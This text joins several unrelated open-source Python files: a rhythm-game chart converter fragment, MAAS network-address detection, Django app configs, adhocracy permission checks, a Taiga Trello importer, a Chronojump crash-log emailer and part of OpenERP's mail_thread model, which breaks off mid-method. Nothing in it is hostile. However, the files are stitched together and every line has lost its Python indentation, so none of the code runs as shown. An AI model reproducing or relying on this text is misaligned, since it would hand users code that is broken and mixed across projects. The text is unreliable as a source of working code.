if not info:
print('Could not parse', argv[1], file=stderr)
exit(1)
print(f'Parse level {parse_level} of {argv[1]}', file=stderr)
headers = {
'#PLAYER': '1',
'#RANK': '3',
'#DIFFICULTY': '4',
'#STAGEFILE': '',
'#GENRE': info.headers['SUBTITLE'],
'#TITLE': '[TJA] ' + info.headers['TITLE'],
'#ARTIST': 'TJA',
'#BPM': info.headers['BPM'],
'#PLAYLEVEL': info.headers['LEVELS'][3],
'#WAV02': 'out.wav',
'#WAVDD': 'dong.wav',
'#WAVCC': 'ka.wav',
}
print('*---------------------- HEADER FIELD')
for k, v in headers.items():
print(k, v)
print('\n*---------------------- MAIN DATA FIELD\n#00001:02\n')
section_seconds = 4 * (60 / float(info.headers['BPM']))
measure_seconds = section_seconds / 192
stop_count = round(-float(info.headers['OFFSET']) / measure_seconds) - (2 * 192)
print(f'#STOP01 {stop_count}')
print(f'#00009:01')
small_notes_counter = 0
for s_num, s in enumerate(info.beatmaps[parse_level]):
s_num = s_num + 2
notes = tuple(filter(lambda o: isinstance(o, NoteTypes), s))
rr_notes = ['00'] * len(notes)
rl_notes = ['00'] * len(notes)
br_notes = ['00'] * len(notes)
bl_notes = ['00'] * len(notes)
for t, n in enumerate(notes):
if n == NoteTypes.BIG_RED:
rr_notes[t], rl_notes[t] = 'DD', 'DD'
elif n == NoteTypes.BIG_BLUE:
br_notes[t], bl_notes[t] = 'CC', 'CC'
else:
sel_notes = None
if n == NoteTypes.RED:
sel_notes = rr_notes if small_notes_counter % 2 == 0 else rl_notes
elif n == NoteTypes.BLUE:
sel_notes = br_notes if small_notes_counter % 2 == 0 else bl_notes
else:
continue
sel_notes[t] = 'DD' if n == NoteTypes.RED else 'CC'
small_notes_counter += 1
m = {12: bl_notes, 13: rl_notes, 15: rr_notes, 18: br_notes}
# print(m)
for channel, ch_notes in m.items():
if not len(ch_notes) or all(map(lambda n: n == '00', ch_notes)):
continue
print('#{:03d}{}:{}'.format(s_num, channel, ''.join(ch_notes)))
# print(s_num, notes, file=stderr)
current_measure = 1
bpm_change_counter = 1
for s_num, s in enumerate(info.beatmaps[parse_level]):
s_num = s_num + 2
non_notes = tuple(filter(lambda o: not isinstance(o, NoteTypes), s))
measures = tuple(filter(lambda o: isinstance(o, Measure), non_notes))
if len(measures):
current_measure = measures[0].value.numerator / measures[0].value.denominator
if current_measure != 1:
print('#{:03d}02:{}'.format(s_num, current_measure))
bpm_changes = tuple(filter(lambda o: isinstance(o, BPMChange), non_notes))
bpm_channel_notes = []
for c in bpm_changes:
print('#BPM{:02d}:{}'.format(bpm_change_counter, c.new_bpm))
bpm_channel_notes.append('{:02d}'.format(bpm_change_counter))
bpm_change_counter += 1
if bpm_channel_notes:
print('#{:03d}08:{}'.format(s_num, ''.join(bpm_channel_notes)))
|
cloudbase/maas
|
src/metadataserver/address.py
|
# Copyright 2012 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Figure out server address for the maas_url setting."""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
str = None
__metaclass__ = type
__all__ = [
'guess_server_address',
]
from fcntl import ioctl
from os import environ
import re
import socket
import struct
from subprocess import check_output
from metadataserver import logger
# fcntl operation as defined in <ioctls.h>. This is GNU/Linux-specific!
SIOCGIFADDR = 0x8915
def get_command_output(*command_line):
"""Execute a command line, and return its output.
Raises an exception if return value is nonzero.
:param *command_line: Words for the command line. No shell expansions
are performed.
:type *command_line: Sequence of unicode.
:return: Output from the command.
:rtype: List of unicode, one per line.
"""
env = {
variable: value
for variable, value in environ.items()
if not variable.startswith('LC_')
}
env.update({
'LC_ALL': 'C',
'LANG': 'en_US.UTF-8',
})
return check_output(command_line, env=env).splitlines()
def find_default_interface(ip_route_output):
"""Find the network interface used for the system's default route.
If no default is found, makes a guess.
:param ip_route_output: Output lines from "ip route show" output.
:type ip_route_output: Sequence of unicode.
:return: unicode, or None.
"""
route_lines = list(ip_route_output)
for line in route_lines:
match = re.match('default\s+.*\sdev\s+(\w+)', line)
if match is not None:
return match.groups()[0]
# Still nothing? Try the first recognizable interface in the list.
for line in route_lines:
match = re.match('\s*(?:\S+\s+)*dev\s+(\w+)', line)
if match is not None:
return match.groups()[0]
return None
def get_ip_address(interface):
"""Get the IP address for a given network interface."""
# Apparently the netifaces module would do this for us.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
interface_name = struct.pack(b'256s', interface[:15])
try:
info = ioctl(s.fileno(), SIOCGIFADDR, interface_name)
except IOError as e:
logger.warn(
"Could not determine address for apparent default interface %s "
"(%s)"
% (interface, e))
return None
return socket.inet_ntoa(info[20:24])
def guess_server_address():
"""Make a guess as to this server's IP address."""
ip_route_output = get_command_output(
'/bin/ip', '-oneline', 'route', 'show')
interface = find_default_interface(ip_route_output)
if interface is None:
return socket.gethostname()
else:
return get_ip_address(interface)
|
etesync/journal-manager
|
journal/apps.py
|
# Copyright © 2017 Tom Hacohen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, version 3.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.apps import AppConfig
class JournalConfig(AppConfig):
name = 'journal'
|
SysTheron/adhocracy
|
src/adhocracy/lib/auth/user.py
|
from paste.deploy.converters import asbool
from pylons import tmpl_context as c, config
from adhocracy.lib.auth.authorization import has
from adhocracy.lib.auth.authorization import NOT_LOGGED_IN
def index(check):
check.perm('user.view')
def show(check, u):
check.perm('user.view')
check.other('user_deleted', u.is_deleted())
def create(check):
check.other('user_logged_in', c.user is not None)
def edit(check, u):
if has('user.manage'):
return
show(check, u)
check.other('user_not_self', u != c.user)
check.other(NOT_LOGGED_IN, not c.user)
def manage(check, u):
check.perm('user.manage')
def message(check, u):
check.perm('user.message')
check.other('user_is_self', u == c.user)
check.other('user_without_email', u.email is None)
def supervise(check, u):
check.other('not_in_instance', not c.instance)
check.other('no_member_in_instance', not u.is_member(c.instance))
check.other('not_user.manage_or_instance.admin',
not (has('user.manage') or has('instance.admin')))
def show_dashboard(check, u):
show(check, u)
check.other('user_not_self', u != c.user)
show_watchlist = show_dashboard
def delete(check, u):
edit(check, u)
allowed = asbool(config.get('adhocracy.self_deletion_allowed', 'true'))
check.other('self_deletion_allowed', not allowed)
def vote(check):
check.other('vote_prohibited', has('vote.prohibit'))
check.other('not_in_instance', not c.instance)
check.other(NOT_LOGGED_IN, not c.user)
check.perm('vote.cast')
|
taigaio/taiga-back
|
taiga/importers/management/commands/import_from_trello.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-present Taiga Agile LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.db.models import Q
from taiga.importers.trello.importer import TrelloImporter
from taiga.users.models import User
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('--token', dest="token", type=str,
help='Auth token')
parser.add_argument('--project-id', dest="project_id", type=str,
help='Project ID or full name (ex: taigaio/taiga-back)')
parser.add_argument('--template', dest='template', default="kanban",
help='template to use: scrum or kanban (default kanban)')
parser.add_argument('--ask-for-users', dest='ask_for_users', const=True,
action="store_const", default=False,
help='Import closed data')
parser.add_argument('--closed-data', dest='closed_data', const=True,
action="store_const", default=False,
help='Import closed data')
parser.add_argument('--keep-external-reference', dest='keep_external_reference', const=True,
action="store_const", default=False,
help='Store external reference of imported data')
def handle(self, *args, **options):
admin = User.objects.get(username="admin")
if options.get('token', None):
token = options.get('token')
else:
(oauth_token, oauth_token_secret, url) = TrelloImporter.get_auth_url()
print("Go to here and come with your token: {}".format(url))
oauth_verifier = input("Code: ")
access_data = TrelloImporter.get_access_token(oauth_token, oauth_token_secret, oauth_verifier)
token = access_data['oauth_token']
print("Access token: {}".format(token))
importer = TrelloImporter(admin, token)
if options.get('project_id', None):
project_id = options.get('project_id')
else:
print("Select the project to import:")
for project in importer.list_projects():
print("- {}: {}".format(project['id'], project['name']))
project_id = input("Project id: ")
users_bindings = {}
if options.get('ask_for_users', None):
print("Add the username or email for next trello users:")
for user in importer.list_users(project_id):
while True:
username_or_email = input("{}: ".format(user['fullName']))
if username_or_email == "":
break
try:
users_bindings[user['id']] = User.objects.get(Q(username=username_or_email) | Q(email=username_or_email))
break
except User.DoesNotExist:
print("ERROR: Invalid username or email")
options = {
"template": options.get('template'),
"import_closed_data": options.get("closed_data", False),
"users_bindings": users_bindings,
"keep_external_reference": options.get('keep_external_reference')
}
importer.import_project(project_id, options)
|
GNOME/chronojump-server
|
email_error_log.py
|
import ConfigParser
import smtplib, email, email.encoders, email.mime.text, email.mime.base
import string
config = ConfigParser.ConfigParser()
config.read('/etc/chronojump.conf')
def user_comments_from_log(log):
user_comment_separator = "----------"
if log.startswith(user_comment_separator):
text = log.split(user_comment_separator)[1]
return "%s\n%s\n%s" % (user_comment_separator, text, user_comment_separator)
return ""
def metadata_to_dictionary(metadata):
"""
Given metadata like "1.5.2.0-email_del_usuari2-o-no@usuari.com"
returns {'version':'1.5.2.0', 'email':'email_del_usuari2-o-no@usuari.com'}
"""
m = {}
m['version'] = metadata.split("-", 1)[0]
m['email'] = metadata.split("-",1)[-1]
return m
def send(metadata_str, filename, attachment_data):
metadata = metadata_to_dictionary(metadata_str)
d = {'user_comments':user_comments_from_log(attachment_data)}
body = string.Template("""Hola,
Hi ha un nou error log al servidor.
$user_comments
El Servidor
""").substitute(d)
emailMsg = email.MIMEMultipart.MIMEMultipart()
emailMsg['Subject'] = "Crash log - %s - %s" % (metadata['version'],
metadata['email'])
emailMsg['From'] = config.get("notification_emails", "from")
emailMsg['To'] = config.get("notification_emails", "to")
emailMsg.attach(email.mime.Text.MIMEText(body))
# Now attach the file
fileMsg = email.mime.base.MIMEBase('application','octet/stream')
fileMsg.set_payload(attachment_data)
email.encoders.encode_base64(fileMsg)
fileMsg.add_header('Content-Disposition','attachment;filename="%s"' % (filename))
emailMsg.attach(fileMsg)
server = smtplib.SMTP('localhost')
server.sendmail(config.get("notification_emails", "from"),
config.get("notification_emails", "to"),
emailMsg.as_string())
if __name__ == "__main__":
data = """----------
This is a comment
from the user
----------
this is a log
from C# :-)
"""
send("1.5.2.0-email_del_usuari2@usuari.com", "this is the file.txt", data)
|
jmesteve/saas3
|
openerp/addons/mail/mail_thread.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2009-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import datetime
import dateutil
import email
try:
import simplejson as json
except ImportError:
import json
from lxml import etree
import logging
import pytz
import time
import xmlrpclib
from email.message import Message
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.addons.mail.mail_message import decode
from openerp.osv import fields, osv, orm
from openerp.osv.orm import browse_record, browse_null
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
def decode_header(message, header, separator=' '):
return separator.join(map(decode, filter(None, message.get_all(header, []))))
class mail_thread(osv.AbstractModel):
''' mail_thread model is meant to be inherited by any model that needs to
act as a discussion topic on which messages can be attached. Public
methods are prefixed with ``message_`` in order to avoid name
collisions with methods of the models that will inherit from this class.
``mail.thread`` defines fields used to handle and display the
communication history. ``mail.thread`` also manages followers of
inheriting classes. All features and expected behavior are managed
by mail.thread. Widgets has been designed for the 7.0 and following
versions of OpenERP.
Inheriting classes are not required to implement any method, as the
default implementation will work for any model. However it is common
to override at least the ``message_new`` and ``message_update``
methods (calling ``super``) to add model-specific behavior at
creation and update of a thread when processing incoming emails.
Options:
- _mail_flat_thread: if set to True, all messages without parent_id
are automatically attached to the first message posted on the
ressource. If set to False, the display of Chatter is done using
threads, and no parent_id is automatically set.
'''
_name = 'mail.thread'
_description = 'Email Thread'
_mail_flat_thread = True
_mail_post_access = 'write'
# Automatic logging system if mail installed
# _track = {
# 'field': {
# 'module.subtype_xml': lambda self, cr, uid, obj, context=None: obj[state] == done,
# 'module.subtype_xml2': lambda self, cr, uid, obj, context=None: obj[state] != done,
# },
# 'field2': {
# ...
# },
# }
# where
# :param string field: field name
# :param module.subtype_xml: xml_id of a mail.message.subtype (i.e. mail.mt_comment)
# :param obj: is a browse_record
# :param function lambda: returns whether the tracking should record using this subtype
_track = {}
def get_empty_list_help(self, cr, uid, help, context=None):
""" Override of BaseModel.get_empty_list_help() to generate an help message
that adds alias information. """
model = context.get('empty_list_help_model')
res_id = context.get('empty_list_help_id')
ir_config_parameter = self.pool.get("ir.config_parameter")
catchall_domain = ir_config_parameter.get_param(cr, uid, "mail.catchall.domain", context=context)
document_name = context.get('empty_list_help_document_name', _('document'))
alias = None
if catchall_domain and model and res_id: # specific res_id -> find its alias (i.e. section_id specified)
object_id = self.pool.get(model).browse(cr, uid, res_id, context=context)
# check that the alias effectively creates new records
if object_id.alias_id and object_id.alias_id.alias_name and \
object_id.alias_id.alias_model_id and \
object_id.alias_id.alias_model_id.model == self._name and \
object_id.alias_id.alias_force_thread_id == 0:
alias = object_id.alias_id
elif catchall_domain and model: # no specific res_id given -> generic help message, take an example alias (i.e. alias of some section_id)
alias_obj = self.pool.get('mail.alias')
alias_ids = alias_obj.search(cr, uid, [("alias_parent_model_id.model", "=", model), ("alias_name", "!=", False), ('alias_force_thread_id', '=', False)], context=context, order='id ASC')
if alias_ids and len(alias_ids) == 1:
alias = alias_obj.browse(cr, uid, alias_ids[0], context=context)
if alias:
alias_email = alias.name_get()[0][1]
return _("""<p class='oe_view_nocontent_create'>
Click here to add new %(document)s or send an email to: <a href='mailto:%(email)s'>%(email)s</a>
</p>
%(static_help)s"""
) % {
'document': document_name,
'email': alias_email,
'static_help': help or ''
}
if document_name != 'document' and help and help.find("oe_view_nocontent_create") == -1:
return _("<p class='oe_view_nocontent_create'>Click here to add new %(document)s</p>%(static_help)s") % {
'document': document_name,
'static_help': help or '',
}
return help
def _get_message_data(self, cr, uid, ids, name, args, context=None):
""" Computes:
- message_unread: has uid unread message for the document
- message_summary: html snippet summarizing the Chatter for kanban views """
res = dict((id, dict(message_unread=False, message_unread_count=0, message_summary=' ')) for id in ids)
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
# search for unread messages, directly in SQL to improve performances
cr.execute(""" SELECT m.res_id FROM mail_message m
RIGHT JOIN mail_notification n
ON (n.message_id = m.id AND n.partner_id = %s AND (n.read = False or n.read IS NULL))
WHERE m.model = %s AND m.res_id in %s""",
(user_pid, self._name, tuple(ids),))
for result in cr.fetchall():
res[result[0]]['message_unread'] = True
res[result[0]]['message_unread_count'] += 1
for id in ids:
if res[id]['message_unread_count']:
title = res[id]['message_unread_count'] > 1 and _("You have %d unread messages") % res[id]['message_unread_count'] or _("You have one unread message")
res[id]['message_summary'] = "<span class='oe_kanban_mail_new' title='%s'><span class='oe_e'>9</span> %d %s</span>" % (title, res[id].pop('message_unread_count'), _("New"))
return res
def read_followers_data(self, cr, uid, follower_ids, context=None):
result = []
technical_group = self.pool.get('ir.model.data').get_object(cr, uid, 'base', 'group_no_one', context=context)
for follower in self.pool.get('res.partner').browse(cr, uid, follower_ids, context=context):
is_editable = uid in map(lambda x: x.id, technical_group.users)
is_uid = uid in map(lambda x: x.id, follower.user_ids)
data = (follower.id,
follower.name,
{'is_editable': is_editable, 'is_uid': is_uid},
)
result.append(data)
return result
def _get_subscription_data(self, cr, uid, ids, name, args, user_pid=None, context=None):
""" Computes:
- message_subtype_data: data about document subtypes: which are
available, which are followed if any """
res = dict((id, dict(message_subtype_data='')) for id in ids)
if user_pid is None:
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
# find current model subtypes, add them to a dictionary
subtype_obj = self.pool.get('mail.message.subtype')
subtype_ids = subtype_obj.search(cr, uid, ['|', ('res_model', '=', self._name), ('res_model', '=', False)], context=context)
subtype_dict = dict((subtype.name, dict(default=subtype.default, followed=False, id=subtype.id)) for subtype in subtype_obj.browse(cr, uid, subtype_ids, context=context))
for id in ids:
res[id]['message_subtype_data'] = subtype_dict.copy()
# find the document followers, update the data
fol_obj = self.pool.get('mail.followers')
fol_ids = fol_obj.search(cr, uid, [
('partner_id', '=', user_pid),
('res_id', 'in', ids),
('res_model', '=', self._name),
], context=context)
for fol in fol_obj.browse(cr, uid, fol_ids, context=context):
thread_subtype_dict = res[fol.res_id]['message_subtype_data']
for subtype in fol.subtype_ids:
thread_subtype_dict[subtype.name]['followed'] = True
res[fol.res_id]['message_subtype_data'] = thread_subtype_dict
return res
def _search_message_unread(self, cr, uid, obj=None, name=None, domain=None, context=None):
return [('message_ids.to_read', '=', True)]
def _get_followers(self, cr, uid, ids, name, arg, context=None):
fol_obj = self.pool.get('mail.followers')
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('res_id', 'in', ids)])
res = dict((id, dict(message_follower_ids=[], message_is_follower=False)) for id in ids)
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
for fol in fol_obj.browse(cr, SUPERUSER_ID, fol_ids):
res[fol.res_id]['message_follower_ids'].append(fol.partner_id.id)
if fol.partner_id.id == user_pid:
res[fol.res_id]['message_is_follower'] = True
return res
def _set_followers(self, cr, uid, id, name, value, arg, context=None):
if not value:
return
partner_obj = self.pool.get('res.partner')
fol_obj = self.pool.get('mail.followers')
# read the old set of followers, and determine the new set of followers
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('res_id', '=', id)])
old = set(fol.partner_id.id for fol in fol_obj.browse(cr, SUPERUSER_ID, fol_ids))
new = set(old)
for command in value or []:
if isinstance(command, (int, long)):
new.add(command)
elif command[0] == 0:
new.add(partner_obj.create(cr, uid, command[2], context=context))
elif command[0] == 1:
partner_obj.write(cr, uid, [command[1]], command[2], context=context)
new.add(command[1])
elif command[0] == 2:
partner_obj.unlink(cr, uid, [command[1]], context=context)
new.discard(command[1])
elif command[0] == 3:
new.discard(command[1])
elif command[0] == 4:
new.add(command[1])
elif command[0] == 5:
new.clear()
elif command[0] == 6:
new = set(command[2])
# remove partners that are no longer followers
self.message_unsubscribe(cr, uid, [id], list(old-new), context=context)
# add new followers
self.message_subscribe(cr, uid, [id], list(new-old), context=context)
def _search_followers(self, cr, uid, obj, name, args, context):
"""Search function for message_follower_ids
Do not use with operator 'not in'. Use instead message_is_followers
"""
fol_obj = self.pool.get('mail.followers')
res = []
for field, operator, value in args:
assert field == name
# TOFIX make it work with not in
assert operator != "not in", "Do not search message_follower_ids with 'not in'"
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('partner_id', operator, value)])
res_ids = [fol.res_id for fol in fol_obj.browse(cr, SUPERUSER_ID, fol_ids)]
res.append(('id', 'in', res_ids))
return res
def _search_is_follower(self, cr, uid, obj, name, args, context):
"""Search function for message_is_follower"""
res = []
for field, operator, value in args:
assert field == name
partner_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
if (operator == '=' and value) or (operator == '!=' and not value): # is a follower
res_ids = self.search(cr, uid, [('message_follower_ids', 'in', [partner_id])], context=context)
else: # is not a follower or unknown domain
mail_ids = self.search(cr, uid, [('message_follower_ids', 'in', [partner_id])], context=context)
res_ids = self.search(cr, uid, [('id', 'not in', mail_ids)], context=context)
res.append(('id', 'in', res_ids))
return res
_columns = {
'message_is_follower': fields.function(_get_followers, type='boolean',
fnct_search=_search_is_follower, string='Is a Follower', multi='_get_followers,'),
'message_follower_ids': fields.function(_get_followers, fnct_inv=_set_followers,
fnct_search=_search_followers, type='many2many', priority=-10,
obj='res.partner', string='Followers', multi='_get_followers'),
'message_ids': fields.one2many('mail.message', 'res_id',
domain=lambda self: [('model', '=', self._name)],
auto_join=True,
string='Messages',
help="Messages and communication history"),
'message_unread': fields.function(_get_message_data,
fnct_search=_search_message_unread, multi="_get_message_data",
type='boolean', string='Unread Messages',
help="If checked new messages require your attention."),
'message_summary': fields.function(_get_message_data, method=True,
type='text', string='Summary', multi="_get_message_data",
help="Holds the Chatter summary (number of messages, ...). "\
"This summary is directly in html format in order to "\
"be inserted in kanban views."),
}
def _get_user_chatter_options(self, cr, uid, context=None):
options = {
'display_log_button': False
}
group_ids = self.pool.get('res.users').browse(cr, uid, uid, context=context).groups_id
group_user_id = self.pool.get("ir.model.data").get_object_reference(cr, uid, 'base', 'group_user')[1]
is_employee = group_user_id in [group.id for group in group_ids]
if is_employee:
options['display_log_button'] = True
return options
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
res = super(mail_thread, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
if view_type == 'form':
doc = etree.XML(res['arch'])
for node in doc.xpath("//field[@name='message_ids']"):
options = json.loads(node.get('options', '{}'))
options.update(self._get_user_chatter_options(cr, uid, context=context))
node.set('options', json.dumps(options))
res['arch'] = etree.tostring(doc)
return res
#------------------------------------------------------
# CRUD overrides for automatic subscription and logging
#------------------------------------------------------
def create(self, cr, uid, values, context=None):
""" Chatter override :
- subscribe uid
- subscribe followers of parent
- log a creation message
"""
if context is None:
context = {}
# subscribe uid unless asked not to
if not context.get('mail_create_nosubscribe'):
pid = self.pool['res.users'].browse(cr, SUPERUSER_ID, uid).partner_id.id
message_follower_ids = values.get('message_follower_ids') or [] # webclient can send None or False
message_follower_ids.append([4, pid])
values['message_follower_ids'] = message_follower_ids
# add operation to ignore access rule checking for subscription
context_operation = dict(context, operation='create')
else:
context_operation = context
thread_id = super(mail_thread, self).create(cr, uid, values, context=context_operation)
# automatic logging unless asked not to (mainly for various testing purpose)
if not context.get('mail_create_nolog'):
self.message_post(cr, uid, thread_id, body=_('%s created') % (self._description), context=context)
# auto_subscribe: take values and defaults into account
create_values = dict(values)
for key, val in context.iteritems():
if key.startswith('default_'):
create_values[key[8:]] = val
self.message_auto_subscribe(cr, uid, [thread_id], create_values.keys(), context=context, values=create_values)
# track values
track_ctx = dict(context)
if 'lang' not in track_ctx:
track_ctx['lang'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).lang
tracked_fields = self._get_tracked_fields(cr, uid, values.keys(), context=track_ctx)
if tracked_fields:
initial_values = {thread_id: dict((item, False) for item in tracked_fields)}
self.message_track(cr, uid, [thread_id], tracked_fields, initial_values, context=track_ctx)
return thread_id
def write(self, cr, uid, ids, values, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
# Track initial values of tracked fields
track_ctx = dict(context)
if 'lang' not in track_ctx:
track_ctx['lang'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).lang
tracked_fields = self._get_tracked_fields(cr, uid, values.keys(), context=track_ctx)
if tracked_fields:
records = self.browse(cr, uid, ids, context=track_ctx)
initial_values = dict((this.id, dict((key, getattr(this, key)) for key in tracked_fields.keys())) for this in records)
# Perform write, update followers
result = super(mail_thread, self).write(cr, uid, ids, values, context=context)
self.message_auto_subscribe(cr, uid, ids, values.keys(), context=context, values=values)
# Perform the tracking
if tracked_fields:
self.message_track(cr, uid, ids, tracked_fields, initial_values, context=track_ctx)
return result
def unlink(self, cr, uid, ids, context=None):
""" Override unlink to delete messages and followers. This cannot be
cascaded, because link is done through (res_model, res_id). """
msg_obj = self.pool.get('mail.message')
fol_obj = self.pool.get('mail.followers')
# delete messages and notifications
msg_ids = msg_obj.search(cr, uid, [('model', '=', self._name), ('res_id', 'in', ids)], context=context)
msg_obj.unlink(cr, uid, msg_ids, context=context)
# delete
res = super(mail_thread, self).unlink(cr, uid, ids, context=context)
# delete followers
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('res_id', 'in', ids)], context=context)
fol_obj.unlink(cr, SUPERUSER_ID, fol_ids, context=context)
return res
def copy(self, cr, uid, id, default=None, context=None):
default = default or {}
default['message_ids'] = []
default['message_follower_ids'] = []
return super(mail_thread, self).copy(cr, uid, id, default=default, context=context)
#------------------------------------------------------
# Automatically log tracked fields
#------------------------------------------------------
def _get_tracked_fields(self, cr, uid, updated_fields, context=None):
""" Return a structure of tracked fields for the current model.
:param list updated_fields: modified field names
:return list: a list of (field_name, column_info obj), containing
always tracked fields and modified on_change fields
"""
lst = []
for name, column_info in self._all_columns.items():
visibility = getattr(column_info.column, 'track_visibility', False)
if visibility == 'always' or (visibility == 'onchange' and name in updated_fields) or name in self._track:
lst.append(name)
if not lst:
return lst
return self.fields_get(cr, uid, lst, context=context)
def message_track(self, cr, uid, ids, tracked_fields, initial_values, context=None):
def convert_for_display(value, col_info):
if not value and col_info['type'] == 'boolean':
return 'False'
if not value:
return ''
if col_info['type'] == 'many2one':
return value.name_get()[0][1]
if col_info['type'] == 'selection':
return dict(col_info['selection'])[value]
return value
def format_message(message_description, tracked_values):
message = ''
if message_description:
message = '<span>%s</span>' % message_description
for name, change in tracked_values.items():
message += '<div> • <b>%s</b>: ' % change.get('col_info')
if change.get('old_value'):
message += '%s → ' % change.get('old_value')
message += '%s</div>' % change.get('new_value')
return message
if not tracked_fields:
return True
for browse_record in self.browse(cr, uid, ids, context=context):
initial = initial_values[browse_record.id]
changes = set()
tracked_values = {}
# generate tracked_values data structure: {'col_name': {col_info, new_value, old_value}}
for col_name, col_info in tracked_fields.items():
initial_value = initial[col_name]
record_value = getattr(browse_record, col_name)
if record_value == initial_value and getattr(self._all_columns[col_name].column, 'track_visibility', None) == 'always':
tracked_values[col_name] = dict(col_info=col_info['string'],
new_value=convert_for_display(record_value, col_info))
elif record_value != initial_value and (record_value or initial_value): # because browse null != False
if getattr(self._all_columns[col_name].column, 'track_visibility', None) in ['always', 'onchange']:
tracked_values[col_name] = dict(col_info=col_info['string'],
old_value=convert_for_display(initial_value, col_info),
new_value=convert_for_display(record_value, col_info))
if col_name in tracked_fields:
changes.add(col_name)
if not changes:
continue
# find subtypes and post messages or log if no subtype found
subtypes = []
for field, track_info in self._track.items():
if field not in changes:
continue
for subtype, method in track_info.items():
if method(self, cr, uid, browse_record, context):
subtypes.append(subtype)
posted = False
for subtype in subtypes:
subtype_rec = self.pool.get('ir.model.data').xmlid_to_object(cr, uid, subtype, context=context)
if not (subtype_rec and subtype_rec.exists()):
_logger.debug('subtype %s not found' % subtype)
continue
message = format_message(subtype_rec.description if subtype_rec.description else subtype_rec.name, tracked_values)
self.message_post(cr, uid, browse_record.id, body=message, subtype=subtype, context=context)
posted = True
if not posted:
message = format_message('', tracked_values)
self.message_post(cr, uid, browse_record.id, body=message, context=context)
return True
#------------------------------------------------------
# mail.message wrappers and tools
#------------------------------------------------------
def _needaction_domain_get(self, cr, uid, context=None):
if self._needaction:
return [('message_unread', '=', True)]
return []
def _garbage_collect_attachments(self, cr, uid, context=None):
""" Garbage collect lost mail attachments. Those are attachments
- linked to res_model 'mail.compose.message', the composer wizard
- with res_id 0, because they were created outside of an existing
wizard (typically user input through Chatter or reports
created on-the-fly by the templates)
- unused since at least one day (create_date and write_date)
"""
limit_date = datetime.datetime.utcnow() - datetime.timedelta(days=1)
limit_date_str = datetime.datetime.strftime(limit_date, tools.DEFAULT_SERVER_DATETIME_FORMAT)
ir_attachment_obj = self.pool.get('ir.attachment')
attach_ids = ir_attachment_obj.search(cr, uid, [
('res_model', '=', 'mail.compose.message'),
('res_id', '=', 0),
('create_date', '<', limit_date_str),
('write_date', '<', limit_date_str),
], context=context)
ir_attachment_obj.unlink(cr, uid, attach_ids, context=context)
return True
def check_mail_message_access(self, cr, uid, mids, operation, model_obj=None, context=None):
""" mail.message check permission rules for related document. This method is
meant to be inherited in order to implement addons-specific behavior.
A common behavior would be to allow creating messages when having read
access rule on the document, for portal document such as issues. """
if not model_obj:
model_obj = self
if hasattr(self, '_mail_post_access'):
create_allow = self._mail_post_access
else:
create_allow = 'write'
if operation in ['write', 'unlink']:
check_operation = 'write'
elif operation == 'create' and create_allow in ['create', 'read', 'write', 'unlink']:
check_operation = create_allow
elif operation == 'create':
check_operation = 'write'
else:
check_operation = operation
model_obj.check_access_rights(cr, uid, check_operation)
model_obj.check_access_rule(cr, uid, mids, check_operation, context=context)
def _get_formview_action(self, cr, uid, id, model=None, context=None):
""" Return an action to open the document. This method is meant to be
overridden in addons that want to give specific view ids for example.
:param int id: id of the document to open
:param string model: specific model that overrides self._name
"""
return {
'type': 'ir.actions.act_window',
'res_model': model or self._name,
'view_type': 'form',
'view_mode': 'form',
'views': [(False, 'form')],
'target': 'current',
'res_id': id,
}
def _get_inbox_action_xml_id(self, cr, uid, context=None):
""" When redirecting towards the Inbox, choose which action xml_id has
to be fetched. This method is meant to be inherited, at least in portal
because portal users have a different Inbox action than classic users. """
